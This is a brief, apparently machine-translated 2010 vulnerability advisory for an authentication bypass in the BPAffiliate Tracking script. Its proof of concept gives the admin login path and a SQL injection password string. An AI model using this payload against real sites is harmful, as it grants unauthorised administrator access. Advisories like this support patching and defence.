BPAffiliate Affiliate Tracking authentication bypass vulnerability-vulnerability warning-the black bar safety net

2010-11-17T00:00:00
ID MYHACK58:62201028366
Type myhack58
Reporter 佚名
Modified 2010-11-17T00:00:00

Description

BPAffiliate Tracking is a dealer program a script that can be used to track affiliate members. BPAffiliate Tracking the presence of the authentication bypass vulnerability that could lead to an attacker direct access to the administrator permissions.

[+]info: ~~~~~~~~~ BPAffiliate Affiliate Tracking Authentication Bypass Vulnerability Author : v3n0m Site : http://yogyacarderlink.web.id/ Date : November, 16-2010 Location : Jakarta, Indonesia Time Zone : GMT +7:0 0 Application : BPAffiliateTracking - Affiliate Tracking Script Price : $24.40 Vendor : http://www.bpowerhouse.info/

[+]poc: ~~~~~~~~~ go to http://127.0.0.1/[path]/adminlogin. asp

then login with Username : admin Password : 1'Or'1'='1

[+]Reference: ~~~~~~~~~ http://www.exploit-db.com/exploits/15551

From: the BugZone